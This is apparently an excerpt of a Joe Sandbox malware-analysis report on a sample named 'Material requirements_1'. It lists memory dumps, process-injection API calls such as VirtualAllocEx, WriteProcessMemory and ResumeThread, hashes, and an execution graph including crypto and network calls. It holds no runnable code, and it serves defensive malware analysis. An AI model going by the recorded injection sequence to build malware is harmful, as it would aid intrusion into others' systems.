                        • CreateActCtxA.KERNEL32(?), ref: 02D059C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083691334.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_Material requirements_1.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 65c471321af8bca56d624650919f01fcf2b25285b9daec059354896dbff0f3c6
                        • Instruction ID: 4f9d542de295c542534ab58b8590ad602808386836da83114e5d4369eb3c3a6d
                        • Opcode Fuzzy Hash: 65c471321af8bca56d624650919f01fcf2b25285b9daec059354896dbff0f3c6
                        • Instruction Fuzzy Hash: AB41F3B1C0071DCBDB24CFA9C884B9DBBB5BF48304F60806AD418AB265DB75694ACF90
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02D059C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083691334.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_Material requirements_1.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05324101
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088519663.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5320000_Material requirements_1.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04DA05C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04DA05C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D0D656,?,?,?,?,?), ref: 02D0D717
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083691334.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_Material requirements_1.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D0D656,?,?,?,?,?), ref: 02D0D717
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083691334.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_Material requirements_1.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04DA06A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04DA06A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04DA04E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04DA04E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02D0AFFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083691334.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_Material requirements_1.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        APIs
                        • PostMessageW.USER32(?,?,?,?), ref: 04DA30CD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        APIs
                        • PostMessageW.USER32(?,?,?,?), ref: 04DA30CD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083302788.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135d000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083335207.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_136d000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083335207.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_136d000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083302788.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135d000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083335207.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_136d000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083335207.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_136d000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: XK$,0
                        • API String ID: 0-3597542875
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: XK$,0
                        • API String ID: 0-3597542875
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: O5>M
                        • API String ID: 0-2302383708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: O5>M
                        • API String ID: 0-2302383708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: nlh_
                        • API String ID: 0-3984638114
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: nlh_
                        • API String ID: 0-3984638114
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: f:
                        • API String ID: 0-2393945263
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: f:
                        • API String ID: 0-2393945263
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088519663.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5320000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b618e52f266a5cc8b03221e8c45d044baf48833017b3ac2148df5c0255cd3a5d
                        • Instruction ID: f66fdbb969d1f068814b79eda62602214a4566d8f4caf95f35ab32ea8eb2c775
                        • Opcode Fuzzy Hash: b618e52f266a5cc8b03221e8c45d044baf48833017b3ac2148df5c0255cd3a5d
                        • Instruction Fuzzy Hash: 2DE10BB4E001198FCB14DFA9C5909AEFBF6FF89305F248169E418AB356D731A942CF61
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e72e100da3daaa97a88ef7c19300f53417f98a7758612c8d5765fb902520c4f0
                        • Instruction ID: 96bc6f01a40b04333552752cd9b79c7f8243ae6fa10e63fc55a96f58cc45a618
                        • Opcode Fuzzy Hash: e72e100da3daaa97a88ef7c19300f53417f98a7758612c8d5765fb902520c4f0
                        • Instruction Fuzzy Hash: 14E11BB4E002298FCB14DFA9C5849AEFBF2FF89305F248169D414AB356D731A942CF61
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 37dcc4ee6cb3f7f16683b5a086d73f3f2f3915b7f751ba3020366d08bbb0c932
                        • Instruction ID: 37ffd662ecaaff20fdc2d4fba843585a6e84173960ff2580c560dee58586c262
                        • Opcode Fuzzy Hash: 37dcc4ee6cb3f7f16683b5a086d73f3f2f3915b7f751ba3020366d08bbb0c932
                        • Instruction Fuzzy Hash: 00E11AB4E001298FCB14DFA8D5809AEFBF2FF89305F248169D458AB356D731A942DF61
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083691334.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 31c3ff5076db8dd1566834f5d93cae258d2274e6ba198f06e975b56722043c1b
                        • Instruction ID: 457fe407b895eeb363e1d52ce21c3b26ab2f65195247f415200f10be7f503fdb
                        • Opcode Fuzzy Hash: 31c3ff5076db8dd1566834f5d93cae258d2274e6ba198f06e975b56722043c1b
                        • Instruction Fuzzy Hash: 60A13936E002058FCF15DFA4C8846AEB7B2FF85304B25856AE805AB3A5DF71ED15CB90
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088519663.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5320000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 92bef1d4f2d1a8da7703409a4b7921e3fc5d12f54bdff7da098167d9312f6972
                        • Instruction ID: eb48945270a832c46e5164f35874d41561e2b24ef23638118573db8cfdf7ef0f
                        • Opcode Fuzzy Hash: 92bef1d4f2d1a8da7703409a4b7921e3fc5d12f54bdff7da098167d9312f6972
                        • Instruction Fuzzy Hash: 77C146B9C807468BD711CF25F8481897BF1BFA1328F944B19D1616B3E1DBB819AACF44
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 57cd174528c07265fdd746cf9c13455cb4f1bd01e8584461c18ccff90b777a87
                        • Instruction ID: 57cd1b1fb3018325794b7f83c0e91677b599a176a4f3a3dd9be965038f75f366
                        • Opcode Fuzzy Hash: 57cd174528c07265fdd746cf9c13455cb4f1bd01e8584461c18ccff90b777a87
                        • Instruction Fuzzy Hash: 658133B4A14219EFCB04CFA9D98089EFBF2FF89210F118529D419BB360D330AA52DF51
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 99348c54f76fb401a184d76e6243264e8a3b5d6eabb63e9a87a6aa22b6eed1b9
                        • Instruction ID: 8edc970d115d225ba36797440ff526e8affa3e5acd2ccab8e00e1237887becbb
                        • Opcode Fuzzy Hash: 99348c54f76fb401a184d76e6243264e8a3b5d6eabb63e9a87a6aa22b6eed1b9
                        • Instruction Fuzzy Hash: 138114B4A11219EFCB04CFA9D98099EFBF2FF89210F158566D419B7350D330AA52DF51
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 722fde2512ca73c3568b202c5073428dcdf81360a307353ff9164d99b52c9cc6
                        • Instruction ID: 5a0c2a660b88edfa0f257aa48eef8c07e9bd3308f53d3e9f0888ab5c751eaa4d
                        • Opcode Fuzzy Hash: 722fde2512ca73c3568b202c5073428dcdf81360a307353ff9164d99b52c9cc6
                        • Instruction Fuzzy Hash: BF6144B5E0421E9FCB04CFAAD5805EEBBB2FF8A300F11951AD411B7240D734AA52DF90
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: efe595aec194ab055ac7743c1ac522cb838910b5896c1842d83b962d0415eb67
                        • Instruction ID: d12c2ca03b33050344d88a8b1f91787a2f23b60fce0fff31e45d30537dcf905a
                        • Opcode Fuzzy Hash: efe595aec194ab055ac7743c1ac522cb838910b5896c1842d83b962d0415eb67
                        • Instruction Fuzzy Hash: 6A5157B5E0421E9FCB04CFA9D5805AEFBB2FF8A300F15852AD410B7244D738AA52DF90
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2dae58ac02cff73ed000e922e277579dc7021f55ba034b9854ff80def50cc11b
                        • Instruction ID: aa60ccb3f47b3696318d1f809185b3e18ae74b061003fb5fdbf4f55f3c9ab61f
                        • Opcode Fuzzy Hash: 2dae58ac02cff73ed000e922e277579dc7021f55ba034b9854ff80def50cc11b
                        • Instruction Fuzzy Hash: 8A5128B4E102198FDB14CFA9D5805AEBBF2FF89305F24C169D458A7356D7309A42CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e76c3e656a86078e022a183833f24b4ea19e1ebfad2ef04c5f99cde9021ddf5
                        • Instruction ID: 3ee49ea8719ad3ca785649a91e85358f0816af2069ebb13c06a152b1b07bb482
                        • Opcode Fuzzy Hash: 2e76c3e656a86078e022a183833f24b4ea19e1ebfad2ef04c5f99cde9021ddf5
                        • Instruction Fuzzy Hash: 535118B5E002198FDB14DFA9C5805AEBBF6FF89305F24C16AD418A7356D7309A42CFA0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088519663.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5320000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5f843dd2a537d3019b9256a9ce4894a5ddc4cbd1924db784b81804ed90f670e
                        • Instruction ID: d5a146eddc92edd4159ce475aed57a6323244c864ed7c79939f5a277b262e43f
                        • Opcode Fuzzy Hash: f5f843dd2a537d3019b9256a9ce4894a5ddc4cbd1924db784b81804ed90f670e
                        • Instruction Fuzzy Hash: 4B4103B5918BA58FCB118F78E4857A6BFF1EB16300F58889AC4888B312D6789446CB51

                        Execution Graph

                        Execution Coverage: 3%
                        Dynamic/Decrypted Code Coverage: 0%
                        Signature Coverage: 5.7%
                        Total number of Nodes: 1062
                        Total number of Limit Nodes: 60
                        execution_graph 46613 41d4e0 46614 41d4f6 _Yarn ___scrt_fastfail 46613->46614 46616 431fa9 21 API calls 46614->46616 46628 41d6f3 46614->46628 46619 41d6a6 ___scrt_fastfail 46616->46619 46617 41d704 46622 41d744 46617->46622 46626 41d770 46617->46626 46630 431fa9 46617->46630 46621 431fa9 21 API calls 46619->46621 46619->46622 46625 41d6ce ___scrt_fastfail 46621->46625 46623 41d73d ___scrt_fastfail 46623->46622 46635 43265f 46623->46635 46625->46622 46627 431fa9 21 API calls 46625->46627 46626->46622 46638 41d484 21 API calls ___scrt_fastfail 46626->46638 46627->46628 46628->46622 46629 41d081 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 46628->46629 46629->46617 46631 431fb3 46630->46631 46632 431fb7 46630->46632 46631->46623 46639 43a89c 46632->46639 46648 43257f 46635->46648 46637 432667 46637->46626 46638->46622 46641 446b0f _strftime 46639->46641 46640 446b4d 46647 445364 20 API calls _abort 46640->46647 46641->46640 46642 446b38 RtlAllocateHeap 46641->46642 46646 442210 7 API calls 2 library calls 46641->46646 46642->46641 46644 431fbc 46642->46644 46644->46623 46646->46641 46647->46644 46649 432598 46648->46649 46653 43258e 46648->46653 46650 431fa9 21 API calls 46649->46650 46649->46653 46651 4325b9 46650->46651 46651->46653 46654 43294a CryptAcquireContextA 46651->46654 46653->46637 46655 43296b CryptGenRandom 46654->46655 46657 432966 46654->46657 46656 432980 CryptReleaseContext 46655->46656 46655->46657 46656->46657 46657->46653 46658 42c5e3 46659 42c5fb ___scrt_fastfail 46658->46659 46667 42c6a1 46658->46667 46661 42c647 46659->46661 46659->46667 46668 42c841 21 API calls ___scrt_fastfail 46659->46668 46669 42c841 21 API calls ___scrt_fastfail 46661->46669 46663 42c64c 46663->46667 46670 42c523 21 API calls 46663->46670 46666 42c666 46666->46667 46671 42c05a 46666->46671 46668->46659 46669->46663 46670->46666 46673 42c074 46671->46673 46672 42c0b4 46680 42c143 46672->46680 46683 42bf8b 
46672->46683 46673->46672 46682 42babe 21 API calls 46673->46682 46676 42c4e4 46676->46667 46677 42c110 46678 42bf8b 24 API calls 46677->46678 46677->46680 46678->46680 46680->46676 46696 42b537 21 API calls 46680->46696 46697 42babe 21 API calls 46680->46697 46682->46672 46698 42cbba 46683->46698 46685 42bf9e 46688 42bfb3 46685->46688 46703 430c12 21 API calls 46685->46703 46687 42c040 46687->46677 46688->46687 46704 430be5 21 API calls 46688->46704 46690 42bfdd 46690->46687 46705 430c12 21 API calls 46690->46705 46692 42bfff 46692->46687 46706 430c12 21 API calls 46692->46706 46694 42c01f 46694->46687 46707 430c12 21 API calls 46694->46707 46696->46680 46697->46680 46708 43266b CryptAcquireContextA CryptGenRandom CryptReleaseContext 46698->46708 46700 42cc04 46700->46685 46701 42cbce 46701->46700 46709 42f86f 21 API calls 46701->46709 46703->46688 46704->46690 46705->46692 46706->46694 46707->46687 46708->46701 46709->46700 46710 426040 46715 426107 recv 46710->46715 46716 44e8c6 46717 44e8d1 46716->46717 46718 44e8ea 46717->46718 46719 44e8f9 46717->46719 46737 445364 20 API calls _abort 46718->46737 46720 44e908 46719->46720 46738 455583 27 API calls 2 library calls 46719->46738 46725 44b9ce 46720->46725 46724 44e8ef ___scrt_fastfail 46726 44b9e6 46725->46726 46727 44b9db 46725->46727 46729 44b9ee 46726->46729 46736 44b9f7 _strftime 46726->46736 46739 446b0f 46727->46739 46746 446ad5 20 API calls _free 46729->46746 46730 44ba21 RtlReAllocateHeap 46734 44b9e3 46730->46734 46730->46736 46731 44b9fc 46747 445364 20 API calls _abort 46731->46747 46734->46724 46736->46730 46736->46731 46748 442210 7 API calls 2 library calls 46736->46748 46737->46724 46738->46720 46740 446b4d 46739->46740 46744 446b1d _strftime 46739->46744 46750 445364 20 API calls _abort 46740->46750 46741 446b38 RtlAllocateHeap 46743 446b4b 46741->46743 46741->46744 46743->46734 46744->46740 46744->46741 46749 442210 7 API calls 2 library calls 46744->46749 46746->46734 46747->46734 46748->46736 
46749->46744 46750->46743 46751 4260a1 46756 42611e send 46751->46756 46757 43a9a8 46759 43a9b4 _swprintf ___scrt_is_nonwritable_in_current_image 46757->46759 46758 43a9c2 46775 445364 20 API calls _abort 46758->46775 46759->46758 46763 43a9ec 46759->46763 46761 43a9c7 46776 43a837 26 API calls _Deallocate 46761->46776 46770 444adc EnterCriticalSection 46763->46770 46765 43a9f7 46771 43aa98 46765->46771 46768 43a9d2 __fread_nolock 46770->46765 46773 43aaa6 46771->46773 46772 43aa02 46777 43aa1f LeaveCriticalSection std::_Lockit::~_Lockit 46772->46777 46773->46772 46778 448426 39 API calls 2 library calls 46773->46778 46775->46761 46776->46768 46777->46768 46778->46773 46779 402bcc 46780 402bd7 46779->46780 46782 402bdf 46779->46782 46797 403315 28 API calls _Deallocate 46780->46797 46783 402beb 46782->46783 46787 4015d3 46782->46787 46784 402bdd 46789 43361d 46787->46789 46788 43a89c _Yarn 21 API calls 46788->46789 46789->46788 46790 402be9 46789->46790 46793 43363e std::_Facet_Register 46789->46793 46798 442210 7 API calls 2 library calls 46789->46798 46792 433dfc std::_Facet_Register 46800 437be7 RaiseException 46792->46800 46793->46792 46799 437be7 RaiseException 46793->46799 46796 433e19 46797->46784 46798->46789 46799->46792 46800->46796 46801 4339ce 46802 4339da ___scrt_is_nonwritable_in_current_image 46801->46802 46833 4336c3 46802->46833 46804 4339e1 46805 433b34 46804->46805 46808 433a0b 46804->46808 47133 433b54 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46805->47133 46807 433b3b 47134 4426ce 28 API calls _abort 46807->47134 46818 433a4a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46808->46818 47127 4434e1 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46808->47127 46810 433b41 47135 442680 28 API calls _abort 46810->47135 46813 433a24 46815 433a2a 46813->46815 47128 443485 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 
